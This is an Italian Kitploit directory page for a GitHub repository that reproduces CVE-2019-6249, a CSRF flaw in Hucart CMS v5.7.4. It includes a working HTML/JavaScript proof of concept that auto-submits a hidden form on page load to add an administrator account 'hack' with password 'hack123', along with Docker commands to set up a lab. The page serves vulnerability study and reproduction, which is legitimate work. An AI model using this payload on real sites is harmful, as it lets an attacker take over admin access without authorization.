Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms ambiente di riproduzione | Kitploit
Strumenti/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms ambiente di riproduzione

Vedi Repository
124 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-6249_Hucart cms

一、Riepilogo della vulnerabilità

Nome vulnerabilità: Vulnerabilità CSRF in Hucart cms v5.7.4 che consente l'aggiunta arbitraria di account amministratore
Data di segnalazione: 2019-01-13
Scopritore: AllenChen([email protected])
Home page prodotto: http://www.hucart.com/
Link software: http://www.hucart.com/
Versione: v5.7.4
ID CVE: CVE-2019-6249

二、Panoramica della vulnerabilità

Hucart cms v5.7.4 presenta una vulnerabilità CSRF: quando un amministratore effettua l'accesso e visita la pagina di test CSRF sottostante, può essere aggiunto un account amministratore chiamato "hack".

三、Codice di sfruttamento

Il codice exp è il seguente: Aggiunge un account amministratore con nome utente "hack" e password "hack123".

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

四、Riferimenti

  • Sito di richiesta CVE in cinese: http://www.iwantacve.cn/index.php/archives/109/
  • Sito ufficiale CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

五、Riproduzione dell'ambiente (Docker)

Nell'ambiente Docker, eseguire i seguenti comandi

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

EMail originale: [email protected]

Scarica lo strumento